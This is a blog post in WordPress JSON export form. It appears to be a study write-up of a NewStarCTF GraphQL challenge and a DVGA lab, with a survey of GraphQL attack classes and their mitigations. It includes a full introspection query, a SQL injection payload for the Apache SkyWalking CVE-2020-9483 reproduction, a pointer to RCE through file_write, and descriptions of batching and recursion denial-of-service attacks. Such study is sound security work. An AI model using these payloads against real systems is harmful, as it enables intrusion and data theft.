{"id":364,"date":"2022-10-22T14:42:44","date_gmt":"2022-10-22T06:42:44","guid":{"rendered":"http:\/\/119.45.47.125\/?p=364"},"modified":"2022-10-25T17:23:57","modified_gmt":"2022-10-25T09:23:57","slug":"graphql-study","status":"publish","type":"post","link":"http:\/\/119.45.47.125\/index.php\/2022\/10\/22\/graphql-study\/","title":{"rendered":"Learning GraphQL from a NewStarCTF Challenge"},"content":{"rendered":"<p><strong>References:<\/strong><\/p>\n<ul>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/zhuanlan.zhihu.com\/p\/124019191\" title=\"Discovering GraphQL endpoints and SQL injection vulnerabilities\">Discovering GraphQL endpoints and SQL injection vulnerabilities<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/mp.weixin.qq.com\/s\/gp2jGrLPllsh5xn7vn9BwQ\" title=\"Playing with GraphQL\">Playing with GraphQL<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/tillend.blog.csdn.net\/article\/details\/123754633\" title=\"GraphQL (1): basic introduction and application examples\">GraphQL (1): basic introduction and application examples<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.yuque.com\/henry-weply\/penetration\/ps5n3g\" title=\"Attacking GraphQL: learning GraphQL security from the DVGA lab\">Attacking GraphQL: learning GraphQL security from the DVGA lab<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/xzfile.aliyuncs.com\/upload\/zcon\/2018\/7_%E6%94%BB%E5%87%BBGraphQL_phithon.pdf\" title=\"Attacking GraphQL\">Attacking GraphQL<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.anquanke.com\/post\/id\/156930\" title=\"GraphQL Security Guide\">GraphQL Security Guide<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/cloud.tencent.com\/developer\/article\/1528799\" title=\"My GraphQL security learning journey\">My GraphQL security learning journey<\/a><\/li>\n<\/ul>\n<hr \/>\n<h3>Origin<\/h3>\n<blockquote>\n  The challenge is WEEK2-ezAPI from <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/buuoj.cn\/match\/matches\/146\" title=\"NewStarCTF\">NewStarCTF<\/a>\n<\/blockquote>\n<hr \/>\n<p><img src=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/2-1024x453.png\" alt=\"\" \/><\/p>\n<p>POSTing different <code>id<\/code> values returns the matching query result; ids up to 6 return a record, and anything beyond that returns DEBUG output<\/p>\n<p>My first thought was SQL injection, but after trying it the response was <code>Hacker! Only Number!<\/code>, so the input is presumably checked with <code>is_numeric($id)<\/code>; switching approach, I found a backup file <code>www.zip<\/code><\/p>\n<p>Opening <code>index.php<\/code> shows that it uses <code>GraphQL<\/code><\/p>\n<pre><code class=\"language-php line-numbers\">&lt;?php\n...\n\n$result = file_get_contents(\"http:\/\/graphql:8080\/v1\/graphql\", false, $context);\nif (isset($id)) {\n    if (waf($id)) {\n        isset($_POST['data']) ? $data = $_POST['data'] : $data = '{\"query\":\"query{\\nusers_user_by_pk(id:' . $id . ') {\\nname\\n}\\n}\\n\", \"variables\":null}';\n        $res = json_decode(send($data));\n        if ($res-&gt;data-&gt;users_user_by_pk-&gt;name !== NULL) {\n            echo \"ID: \" . $id . \"&lt;br&gt;Name: \" . $res-&gt;data-&gt;users_user_by_pk-&gt;name;\n        } else {\n            echo \"&lt;b&gt;Can't found it!&lt;\/b&gt;&lt;br&gt;&lt;br&gt;DEBUG: \";\n            var_dump($res-&gt;data);\n        }\n    } else {\n        ...\n    }\n    ...\n\n?&gt;\n<\/code><\/pre>\n<p>First, a look at the <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/graphql.cn\/\" title=\"Chinese documentation\">Chinese documentation<\/a>, which describes <code>GraphQL<\/code> as follows<\/p>\n<blockquote>\n  GraphQL is a query language for your API, and a server-side runtime for executing queries using a type system you define for your data. GraphQL isn't tied to any specific database or storage engine and is instead backed by your existing code and data.\n<\/blockquote>\n<p>Most articles compare <code>GraphQL<\/code> with <code>REST API<\/code>s: the former does not need to maintain many separate <code>API<\/code> endpoints, since a single <code>URL<\/code> handles different requests by changing the value sent in the <code>POST<\/code> body. The figure below illustrates the advantages of the former over the latter<\/p>\n<p><img src=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/image-e1666314268524-1024x844.png\" alt=\"\" \/><\/p>\n<p><code>GraphQL<\/code> provides an <code>Introspection<\/code> mechanism<\/p>\n<blockquote>\n  We designed the type system, so we know what types are available, but if we didn&#8217;t, we can ask GraphQL, by querying the __schema field, always available on the root type of a Query. Let&#8217;s do so now, and ask what types are available.\n<\/blockquote>\n<p>With introspection, <code>__schema<\/code> and <code>__type<\/code> queries list the available objects and all of their fields; if this is left misconfigured, it easily leads to information disclosure<\/p>\n<p>The introspection <code>payload<\/code> can be found in <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/github.com\/doyensec\/inql\/blob\/master\/inql\/introspection.py\" title=\"InQL Scanner\">InQL Scanner<\/a>; the response contains everything the API endpoint exposes<\/p>\n<pre><code class=\"language-python line-numbers\">introspection_query = \"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}\"\n<\/code><\/pre>\n<p>In the challenge it can be passed directly as <code>$data<\/code>; sending it with <code>Postman<\/code> is probably the most convenient<\/p>\n<p><img src=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/3-1024x445.png\" alt=\"\" \/><\/p>\n<p>The relevant part of the introspection result:<\/p>\n<pre><code class=\"language-php line-numbers\">object(stdClass)#181 (8) {\n  [\"kind\"]=&gt;\n  string(6) \"OBJECT\"\n  [\"name\"]=&gt;\n  string(28) \"ffffllllaaagggg_1n_h3r3_flag\"\n  [\"description\"]=&gt;\n  string(59) \"columns and relationships of \"ffffllllaaagggg_1n_h3r3.flag\"\"\n  [\"fields\"]=&gt;\n  array(1) {\n    [0]=&gt;\n    object(stdClass)#182 (6) {\n      [\"name\"]=&gt;\n      string(4) \"flag\"\n      [\"description\"]=&gt;\n      NULL\n      [\"args\"]=&gt;\n      array(0) {\n      }\n      [\"type\"]=&gt;\n      object(stdClass)#183 (3) {\n        [\"kind\"]=&gt;\n        string(8) \"NON_NULL\"\n        [\"name\"]=&gt;\n        NULL\n        [\"ofType\"]=&gt;\n        object(stdClass)#184 (3) {\n          [\"kind\"]=&gt;\n          string(6) \"SCALAR\"\n          [\"name\"]=&gt;\n          string(6) \"String\"\n          [\"ofType\"]=&gt;\n          NULL\n        }\n      }\n      [\"isDeprecated\"]=&gt;\n      bool(false)\n      [\"deprecationReason\"]=&gt;\n      NULL\n    }\n  }\n  [\"inputFields\"]=&gt;\n  NULL\n  [\"interfaces\"]=&gt;\n  array(0) {\n  }\n  [\"enumValues\"]=&gt;\n  NULL\n  [\"possibleTypes\"]=&gt;\n  NULL\n}\n<\/code><\/pre>\n<p>So querying <code>flag<\/code> on <code>ffffllllaaagggg_1n_h3r3_flag<\/code> is all that is needed<\/p>\n<blockquote>\n  Every GraphQL service has a <code>query<\/code> type and may or may not have a <code>mutation<\/code> type. These types are the same as a regular object type, but they are special <strong>because they define the entry point of every GraphQL query<\/strong>\n<\/blockquote>\n<pre><code class=\"language-json line-numbers\">$data={\"query\":\"query{ffffllllaaagggg_1n_h3r3_flag{flag}}\"}\n<\/code><\/pre>\n<hr \/>\n<h3>Study &amp;&amp; Lab Practice<\/h3>\n<hr \/>\n<p><code>GraphQL<\/code> has come up in many past CTF competitions, and phithon also presented a related security talk at the Xianzhi White Hat Conference<\/p>\n<p><img src=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/2-1-1024x507.png\" alt=\"\" \/><\/p>\n<hr \/>\n<h4>1. Injection<\/h4>\n<p>If user-supplied parameter values are not properly handled and the query is built by string concatenation, an attacker may inject malicious statements and change the structure of the <code>GraphQL<\/code> query<\/p>\n<p>A high-impact example is CVE-2020-9483, a SQL injection vulnerability in the Apache SkyWalking GraphQL interface<\/p>\n<p>The <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/github.com\/apache\/skywalking\/pull\/4639\/commits\/2b6aae3b733f9dbeae1d6eff4f1975c723e1e7d1?diff=split&amp;w=0\" title=\"Fix\">Fix<\/a> lets us compare the code before and after the patch<\/p>\n<p><img src=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-1-1024x360.png\" alt=\"\" \/><\/p>\n<p>In the original version <code>idValues<\/code> was concatenated directly into the query; the fixed code uses <code>?<\/code> placeholders with a prepared statement<\/p>\n<p>In addition, <code>String metricName<\/code> was also <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/github.com\/apache\/skywalking\/commit\/0bd81495965d801315dd7417bb17333ae0eccf3b\" title=\"remove\">removed<\/a> from <code>LogQuery<\/code><\/p>\n<p><img src=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-2-1024x536.png\" alt=\"\" \/><\/p>\n<p>Although injection issues exist, they should be rare in normal business code; introducing parameterized queries solves most of the potential security problems<\/p>\n<p>Reproducing it in a vulnerable environment built with Vulhub:<\/p>\n<pre><code class=\"language-json line-numbers\">{\n    \"query\": \"query queryLogs($condition: LogQueryCondition) { queryLogs(condition: $condition) { total logs { serviceId serviceName isError content } } }\",\n    \"variables\": {\n        \"condition\": {\n            \"metricName\": \"1ndweb\",\n            \"endpointId\": \"1\",\n            \"traceId\": \"1\",\n            \"state\": \"ALL\",\n            \"stateCode\": \"1\",\n            \"paging\": {\n                \"pageSize\": 10\n            }\n        }\n    }\n}\n<\/code><\/pre>\n<p>Here the value of the <code>metricName<\/code> parameter we send is concatenated after <code>from<\/code>; appending a malicious query fragment produces an injection<\/p>\n<p><img src=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-4-1024x446.png\" alt=\"\" \/><\/p>\n<p><code>&quot;metricName&quot;:&quot;INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --&quot;<\/code><\/p>\n<p><img src=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-3-1024x506.png\" alt=\"\" \/><\/p>\n<p>Naturally, <code>file_write<\/code> can also be used to write a malicious class, which is then loaded through <code>LINK_SCHEMA<\/code> to achieve RCE<\/p>\n<p>For the details see <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/cloud.tencent.com\/developer\/article\/1804563\" title=\"Apache Skywalking &lt;=8.3 SQL injection analysis and reproduction\">Apache Skywalking &lt;=8.3 SQL injection analysis and reproduction<\/a><\/p>\n<hr \/>\n<h4>2. Information Disclosure<\/h4>\n<p>In real business scenarios, the more common issues are information disclosure and denial of service caused by improper permission configuration; the disclosure itself has nothing to do with the API call as such, it is usually the authentication and authorization at call time that is missing<\/p>\n<p>The Authorization section of the <code>GraphQL<\/code> documentation also gives a recommendation<\/p>\n<blockquote>\n  Delegate authorization logic to the business logic layer\n<\/blockquote>\n<p>If developers have not implemented proper authorization for each <code>Query<\/code> and <code>Mutation<\/code>, an attacker can easily use <code>GraphQL<\/code> introspection to obtain information about every interface defined on the backend<\/p>\n<p><a class=\"wp-editor-md-post-content-link\" href=\"http:\/\/wiki.peiqi.tech\/wiki\/webapp\/GitLab\/GitLab%20Graphql%E9%82%AE%E7%AE%B1%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E%20CVE-2020-26413.html\" title=\"CVE-2020-26413 GitLab GraphQL email information disclosure vulnerability\">CVE-2020-26413 GitLab GraphQL email information disclosure vulnerability<\/a> is exactly this: given a known username, a <code>GraphQL<\/code> query leaks the user's email address<\/p>\n<p><img src=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-5-1024x637.png\" alt=\"\" \/><\/p>\n<p>Even without a known username, a single <code>GraphQL<\/code> query can return all usernames and email addresses at once; the specific payload can be found in the PeiQi wiki<\/p>\n<p>Besides this, phithon's slides also mention<\/p>\n<blockquote>\n  Pay close attention to deprecated fields\n<\/blockquote>\n<p>If developers do not handle deprecated fields properly, setting the <code>includeDeprecated<\/code> argument to <code>true<\/code> makes <code>__type<\/code> expose them, and they may still be usable in queries<\/p>\n<p>For mitigations see <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.anquanke.com\/post\/id\/156930\" title=\"GraphQL Security Guide\">GraphQL Security Guide<\/a><\/p>\n<hr \/>\n<h4>3. Denial of Service<\/h4>\n<p>Denial of service mainly stems from the nested, composable relationships between <code>GraphQL<\/code> objects: if nesting depth is not limited, an attacker can exploit it to exhaust the server<\/p>\n<hr \/>\n<h4>4. The DVGA Lab<\/h4>\n<h5>(1) graphw00f<\/h5>\n<blockquote>\n  graphw00f is GraphQL Server Engine Fingerprinting utility for software security professionals looking to learn more about what technology is behind a given GraphQL endpoint.\n<\/blockquote>\n<p><code>python main.py -d -t http:\/\/ip<\/code> runs detection over the common endpoint paths; if <code>GraphQL<\/code> is in use it prints the path<\/p>\n<p><code>python main.py -f -t http:\/\/ip\/{graphql}<\/code> fingerprints the path obtained in the previous step<\/p>\n<blockquote>\n  Point graphw00f at DVGA to figure out what technology it&#8217;s running.\n<\/blockquote>\n<p><img src=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-6-1024x125.png\" alt=\"\" \/><\/p>\n<p>The link provides the Security Considerations for the detected <code>Engine<\/code> as a reference<\/p>\n<p><img src=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-7-1024x261.png\" alt=\"\" \/><\/p>\n<h5>(2) Batch Query Attack<\/h5>\n<blockquote>\n  GraphQL supports Request Batching. Batched requests are processed one after the other by GraphQL, which makes it a good candidate for Denial of Service attacks, as well as other attacks <strong>such as Brute Force and Enumeration<\/strong>.<br>\n  If a resource intensive GraphQL query is identified, an attacker may leverage batch processing to call the query and potentially overwhelm the service for a prolonged period of time.<br>\n  The query <strong>systemUpdate<\/strong> seems to be taking a long time to complete, and can be used to overwhelm the server by batching a system update request query.\n<\/blockquote>\n<p>This is easy to understand: <code>GraphQL<\/code> supports <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.apollographql.com\/blog\/apollo-client\/performance\/query-batching\/\" title=\"query batching\">query batching<\/a>, so multiple queries can be sent in a single <code>POST<\/code> request, which can lead to denial of service and brute force, for example with the <code>systemUpdate<\/code> query shown<\/p>\n<p><img src=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-8-1024x399.png\" alt=\"\" \/><\/p>\n<p>One can imagine how long the response takes when several <code>systemUpdate<\/code> queries are batched into a single request<\/p>\n<p>Likewise, if authenticated operations such as user login are not rate-limited, brute forcing becomes easy, because <code>GraphQL<\/code> batching treats such a request as a normal operation and the request time does not multiply<\/p>\n<p><img src=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-9-1024x511.png\" alt=\"\" \/><\/p>\n<h5>(3) Deep Recursion Query Attack<\/h5>\n<blockquote>\n  In GraphQL, when types reference each other, <strong>it is often possible to build a circular query that grows exponentially to a point it could bring the server down to its knees<\/strong>. Countermeasures such as <strong>max_depth<\/strong> can help mitigate these types of attacks.\n<\/blockquote>\n<p>When queries nest types that reference each other, a deep recursion query attack becomes possible; with enough nesting levels the server crashes<\/p>\n<p>To avoid this we need to limit query depth on the <code>GraphQL<\/code> server, and also avoid such circular references when designing the <code>GraphQL<\/code> schema<\/p>\n<h5>(4) Resource Intensive Query Attack<\/h5>\n<blockquote>\n  Sometimes, certain queries may be computationally more expensive than others. A query may include certain fields that would trigger more complex backend logic in order to fulfill the query resolution. As attackers, we can abuse it by calling these actions frequently in order to cause resource exhaustion.\n<\/blockquote>\n<p>This is like the <code>systemUpdate<\/code> query tested above: such queries trigger more complex backend logic to resolve, and repeated requests exhaust resources. The mitigation is <code>Query Cost Analysis<\/code>: set an <code>upper threshold<\/code> to reject queries with a high resource cost, or prevent repeated similar requests within the same time window<\/p>\n<h5>(5) Information Disclosure<\/h5>\n<p>We already saw introspection queries in the CTF challenge above; the result can be pasted into GraphiQL for visual inspection<\/p>\n<p>The lab also mentions another information disclosure, <code>GraphQL Field Suggestions<\/code>: when introspection is disabled, sending a wrong field name makes <code>GraphQL<\/code> respond with similar field names; there probably is not much room to exploit this \ud83e\udd14<\/p>\n<p><img src=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-10-1024x492.png\" alt=\"\" \/><\/p>\n<h5>(6) Code Execution &amp;&amp; Injection<\/h5>\n<p>Code execution and injection are unlikely to be encountered in real business environments; they are specific to the lab environment, but worth playing with<\/p>\n<p>For details see the following two articles:<\/p>\n<ul><li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/zhuanlan.zhihu.com\/p\/390876937\" title=\"[Security Notes] Playing with GraphQL - DVGA Lab (Part 1)\">[Security Notes] Playing with GraphQL &#8211; DVGA Lab (Part 1)<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/zhuanlan.zhihu.com\/p\/391552292\" title=\"[Security Notes] Playing with GraphQL - DVGA Lab (Part 2)\">[Security Notes] Playing with GraphQL &#8211; DVGA Lab (Part 2)<\/a><\/li>\n<\/ul>","protected":false},"excerpt":{"rendered":"References: Discovering GraphQL endpoints and SQL injection vulnerabilities Playing with GraphQL GraphQL (1): basic introduction and application examples [&hellip;]","protected":false},"author":1,"featured_media":366,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[27,26],"tags":[28],"class_list":["post-364","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-graphql","category-study","tag-graphql"],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1.webp?fit=2000%2C1000","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/364","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/comments?post=364"}],"version-history":[{"count":14,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/364\/revisions"}],"predecessor-version":[{"id":452,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/364\/revisions\/452"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/media\/366"}],"wp:attachment":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/media?parent=364"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/categories?post=364"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/tags?post=364"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}